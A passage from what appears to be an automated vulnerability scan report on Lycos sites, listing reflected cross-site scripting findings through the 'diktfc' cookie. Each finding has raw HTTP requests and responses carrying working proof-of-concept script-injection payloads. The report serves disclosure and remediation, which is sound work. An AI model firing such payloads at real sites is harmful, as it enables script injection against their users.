Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

3.149. http://deals.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ccd"%3balert(1)//96aec635ab1 was submitted in the diktfc cookie. This input was echoed as 97ccd";alert(1)//96aec635ab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd"%3balert(1)//96aec635ab1

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd";alert(1)//96aec635ab1"
});
</script>
...[SNIP]...

3.150. http://deals.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4848d"><script>alert(1)</script>8271264fa99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99&amp;cj=1" alt="tracker" />
...[SNIP]...

3.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3373"%3balert(1)//cb851bc2ef was submitted in the diktfc cookie. This input was echoed as a3373";alert(1)//cb851bc2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373"%3balert(1)//cb851bc2ef; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/bootstrap.js",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373";alert(1)//cb851bc2ef"
});
</script>
...[SNIP]...

3.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b481"><script>alert(1)</script>a5c183e28ee was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/bootstrap.js&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee&amp;cj=1" alt="tracker" />
...[SNIP]...

3.153. http://deals.lycos.com/coupons [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25a4"%3balert(1)//d3e20f2e46f was submitted in the diktfc cookie. This input was echoed as a25a4";alert(1)//d3e20f2e46f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4"%3balert(1)//d3e20f2e46f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4";alert(1)//d3e20f2e46f"
});
</script>
...[SNIP]...

3.154. http://deals.lycos.com/coupons [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ede"><script>alert(1)</script>07af65f492e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e&amp;cj=1" alt="tracker" />
...[SNIP]...

3.155. http://deals.lycos.com/coupons/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ef"><script>alert(1)</script>40c20ce42a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons/stores&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6&amp;cj=1" alt="tracker" />
...[SNIP]...

3.156. http://deals.lycos.com/coupons/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c07ea"%3balert(1)//565a1b485f was submitted in the diktfc cookie. This input was echoed as c07ea";alert(1)//565a1b485f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea"%3balert(1)//565a1b485f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons/stores",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea";alert(1)//565a1b485f"
});
</script>
...[SNIP]...

3.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa21f"><script>alert(1)</script>c82f0e9250f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f&amp;cj=1" alt="tracker" />
...[SNIP]...

3.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d1"%3balert(1)//99923b16c8b was submitted in the diktfc cookie. This input was echoed as bd5d1";alert(1)//99923b16c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1"%3balert(1)//99923b16c8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1";alert(1)//99923b16c8b"
});
</script>
...[SNIP]...

3.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830f7"%3balert(1)//a3a48905539 was submitted in the diktfc cookie. This input was echoed as 830f7";alert(1)//a3a48905539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
